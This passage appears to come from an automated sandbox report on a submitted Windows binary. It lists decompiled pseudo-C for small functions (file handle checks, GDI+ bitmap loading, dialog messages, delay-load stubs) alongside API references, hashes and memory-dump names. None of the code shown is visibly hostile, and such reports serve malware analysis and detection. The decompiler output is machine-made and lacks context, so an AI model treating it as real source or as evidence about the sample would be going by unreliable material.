					 *((char*)(_t20 + 0x100d)) = E00E6A3ED( *((intOrPtr*)(_t20 + 0x1008)));
					return 1;
				}
				L1:
				return 0;
			}

0x00e6a6ba
0x00e6a6c2
0x00e6a6d0
0x00e6a6dd
0x00e6a6e5
0x00000000
0x00000000
0x00e6a6e8
0x00e6a6f4
0x00e6a706
0x00e6a711
0x00000000
0x00e6a717
0x00e6a6d2
0x00000000

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E6A6E8

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 02e72546500aa0ee1bacd70bffb6ee6c242d0e887ee066077eeb376e87941f9c
Instruction ID: a80038ada6920e4c62435891273bda4096d9c6a8301a4bd4a1e144e4a27f52bb
Opcode Fuzzy Hash: 02e72546500aa0ee1bacd70bffb6ee6c242d0e887ee066077eeb376e87941f9c
Instruction Fuzzy Hash: FCF0E935448380ABCA222774A8047CB7BE06F153F5F0C9A4AF1FD321D2C2B414959F23

Uniqueness

Uniqueness Score: -1.00%

Function 00E70957 Relevance: 1.5, APIs: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E70957() {
				void* __esi;
				void* _t2;

				L00E71663(); // executed
				_t2 = E00E71668();
				if(_t2 != 0) {
					_t2 = E00E66E63(_t2, 0xea0f50, 0xff, 0xff);
				}
				if( *0xea0f5c != 0) {
					_t2 = E00E66E63(_t2, 0xea0f50, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}

0x00e70959
0x00e7095e
0x00e7096f
0x00e70974
0x00e70974
0x00e70980
0x00e70985
0x00e70985
0x00e7098c
0x00e70994

APIs

SetThreadExecutionState.KERNEL32 ref: 00E7098C

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 5ce3115b5b456d727d2a31d8b340b5e8ba8e089d702803c57b9b8c7d5590af24
Instruction ID: 13f1dacae2e5594138ded7c3a0c29affa57706741c9b3327049be98d51228a16
Opcode Fuzzy Hash: 5ce3115b5b456d727d2a31d8b340b5e8ba8e089d702803c57b9b8c7d5590af24
Instruction Fuzzy Hash: A1D02B157102106DEA213339B846BFD068A4FC7360F0C70A2B10D762C3CB451C4787A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E79FDB Relevance: 1.5, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00E79FDB(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L00E7E4DC();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E00E79D6F(__eax, _a4, _a8); // executed
				return _t6;
			}

0x00e79fde
0x00e79fdf
0x00e79fe1
0x00e79fe6
0x00e79feb
0x00000000
0x00e79ffc
0x00e79ff5
0x00000000

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00E79FE1

Part of subcall function 00E79D6F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E79D90

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 1be1482ac2147708aedbcb5cadff49528507359555a760097fab3dd187c3424e
Instruction ID: 9a9b4bd078cc42276a0bfa5d37b2520e34e34052ccfd275a9a12ef0065e75750
Opcode Fuzzy Hash: 1be1482ac2147708aedbcb5cadff49528507359555a760097fab3dd187c3424e
Instruction Fuzzy Hash: 05D05E3021420D6ADF54AA648C02ABA7A99DF00340F00D065FD0CE5242EE71CD106291

Uniqueness

Uniqueness Score: -1.00%

Function 00E69B29 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E69B29(void* __ecx) {
				long _t3;

				if( *(__ecx + 4) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 4)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}

0x00e69b2d
0x00e69b35
0x00e69b3e
0x00e69b4b
0x00e69b45
0x00e69b47
0x00e69b47
0x00e69b2f
0x00e69b31
0x00e69b31

APIs

GetFileType.KERNELBASE(000000FF,00E69A27), ref: 00E69B35

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 467aa036ceb42b8dbbb09601ca062e361124593425dfd5355207888de29951a4
Instruction ID: 2b1559e6f869b10a7568258d85d6b8167848ed473b80cea739b7d1d837abdf33
Opcode Fuzzy Hash: 467aa036ceb42b8dbbb09601ca062e361124593425dfd5355207888de29951a4
Instruction Fuzzy Hash: 29D01230091140958F218A347D49095A6569B433EEB38DAA5D025D40A6C732C803F584

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D6D7 Relevance: 1.5, APIs: 1, Instructions: 13
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E7D6D7(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {

				SendDlgItemMessageW( *0xea8458, 0x6a, 0x402, E00E6FDC7(_a20, _a24, _a28, _a32), 0); // executed
				return E00E7AF04();
			}

0x00e7d6fc
0x00e7d707

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00E7D6FC

Part of subcall function 00E7AF04: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E7AF15
Part of subcall function 00E7AF04: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E7AF26
Part of subcall function 00E7AF04: IsDialogMessageW.USER32(000202B6,?), ref: 00E7AF3A
Part of subcall function 00E7AF04: TranslateMessage.USER32(?), ref: 00E7AF48
Part of subcall function 00E7AF04: DispatchMessageW.USER32(?), ref: 00E7AF52

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: aa2daf8c29091f67105366b21cce5fa694a9ea0ac6a0018f1ee8001433d7f83b
Instruction ID: e06321dbc2078509ab6ae102860beed67153e2ffb48835b44e07e88be7f3a4ba
Opcode Fuzzy Hash: aa2daf8c29091f67105366b21cce5fa694a9ea0ac6a0018f1ee8001433d7f83b
Instruction Fuzzy Hash: 29D09E71144200BED6052B52DE06F1E7AE6BB8CB05F404565F344740B18A62AD31DB16

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DBE1 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DBE1() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bdc4, 0xec2134); // executed
				goto __eax;
			}

0x00e7db58
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9dfa303fcf2264472f200a1ac4691d0ac05407d87d231a772a530c5feba277a0
Instruction ID: 530738e8e63f67a6995ee936de539b12929f17821963d678dd2b8e1902aeafd0
Opcode Fuzzy Hash: 9dfa303fcf2264472f200a1ac4691d0ac05407d87d231a772a530c5feba277a0
Instruction Fuzzy Hash: B9B0128535F1416C310861457F03D36015DC8C4B10331F41EF109F12C1D4811C031031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DBEB Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DBEB() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bdc4, 0xec2130); // executed
				goto __eax;
			}

0x00e7db58
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 742d4953fd714b77ab6fe3ad90c0e9030ccde224971456362dbf4d48ee66d582
Instruction ID: 34b0b5988fed8fee533a428dcc60dc510da7a8bab47292936707562573b0ada3
Opcode Fuzzy Hash: 742d4953fd714b77ab6fe3ad90c0e9030ccde224971456362dbf4d48ee66d582
Instruction Fuzzy Hash: 52B0128536E5416C310461447E03D36019DCCC4B10331F41EF109F12C1D8401C021031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DBFF Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DBFF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bdc4, 0xec2128); // executed
				goto __eax;
			}

0x00e7db58
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fedbe5f2805c78fefce1a8113790aa8cf779980db7cad926fdd94dbae8d04216
Instruction ID: 7d2ed2d1c1b2da6f12d601e89100a7ce83e365c4269063478e56250eedcdca57
Opcode Fuzzy Hash: fedbe5f2805c78fefce1a8113790aa8cf779980db7cad926fdd94dbae8d04216
Instruction Fuzzy Hash: 1FB0128535D2416C314461447E03D36019CC8C4B10332F51EF109F11C1D4401C421031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DBC3 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DBC3() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bdc4, 0xec2140); // executed
				goto __eax;
			}

0x00e7db58
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c995327cd37a4c2cd6ef58ccdb140c2f274fb2c02d0631c0ff05bc92a190b8c1
Instruction ID: 85f0b30484dc9c0c02c1c9e10a97b75aba6428f1aa345bccb728f46d5211d0be
Opcode Fuzzy Hash: c995327cd37a4c2cd6ef58ccdb140c2f274fb2c02d0631c0ff05bc92a190b8c1
Instruction Fuzzy Hash: 7AB0129575D1416C710861457E03D36015CC8C4B10331F41EF50DF11D1D8401C021031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DBCD Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DBCD() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bdc4, 0xec213c); // executed
				goto __eax;
			}

0x00e7db58
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e6bf4efab4b5378f870e7132849d0d29ccbe6af207c42b00f08477d5f39153e2
Instruction ID: dfa1deaea5ed57e468fa9651bb0b5fa6aafd7e5c2115d956c180e140f6ca83f7
Opcode Fuzzy Hash: e6bf4efab4b5378f870e7132849d0d29ccbe6af207c42b00f08477d5f39153e2
Instruction Fuzzy Hash: 0EB0128539E2416C310461447E03D36015DC8C4B10331F41EF509F12C1D4401C021031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DBA5 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DBA5() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bdc4, 0xec214c); // executed
				goto __eax;
			}

0x00e7db58
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cf80025134c7dcea1a10ec9389f5cc2b8878f7355ffd67da377588d9827bab68
Instruction ID: d2e2bd16b4cf4784f0685b6b57fbb0e118506930d65ad97b79c09681fdded7fd
Opcode Fuzzy Hash: cf80025134c7dcea1a10ec9389f5cc2b8878f7355ffd67da377588d9827bab68
Instruction Fuzzy Hash: 08B0129675D2416C710461447E03D36015CC8C4B10331F41EF90DF11D1D4401C021031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DBAF Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DBAF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bdc4, 0xec2148); // executed
				goto __eax;
			}

0x00e7db58
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 64d4a39d9d08386387f6b665fc8574dc2c1d7ad2111ce53ed928bacab2194cb5
Instruction ID: 5a41b680024258cbd28663c60f469b789628c8dd3f08272b8ebee4a7210fdb77
Opcode Fuzzy Hash: 64d4a39d9d08386387f6b665fc8574dc2c1d7ad2111ce53ed928bacab2194cb5
Instruction Fuzzy Hash: EDB0129575D2416C714461447E03D36015CC8C4B10332F51EF50DF11D1D4401C421031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DBB9 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DBB9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bdc4, 0xec2144); // executed
				goto __eax;
			}

0x00e7db58
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: add292496ac2bd52d4ba0b7f2f23d20d4e08505d32cbf572d2102fb5e3f39f99
Instruction ID: 0b6e4fe29911196132c296dc5e1578e78e2090d50442248dfa243b2b381be5cb
Opcode Fuzzy Hash: add292496ac2bd52d4ba0b7f2f23d20d4e08505d32cbf572d2102fb5e3f39f99
Instruction Fuzzy Hash: C1B0129575D1416C710861457F03D36015CC8C4B10331F41EF50DF11D1D4811D031031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DB87 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DB87() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00E7E221(_t3, _t4, _t8, _t9, _t10, 0xe9bdc4, 0xec2158); // executed
				goto __eax;
			}

0x00e7db58
0x00e7db60
0x00e7db67

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00E7DB60

Part of subcall function 00E7E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E7E29E
Part of subcall function 00E7E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E7E2AF

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c868d00a0e0011f2646c82b2ce3f11db4d96667a995a95bbda51f86a503b48d3
Instruction ID: cb66dea3d2767825bdb6a0c9d3e96a144468b609640ac85fbe35f63ec207ea58
Opcode Fuzzy Hash: c868d00a0e0011f2646c82b2ce3f11db4d96667a995a95bbda51f86a503b48d3
Instruction Fuzzy Hash: 58B0128535D2816C314461547E03D36015CC8C4B10332F56EF109F12C1D4401C871031

Uniqueness

Uniqueness Score: -1.00%

Function 00E7DB9B Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00E7DB9B() {
				void* _t3;
				void* _t4;
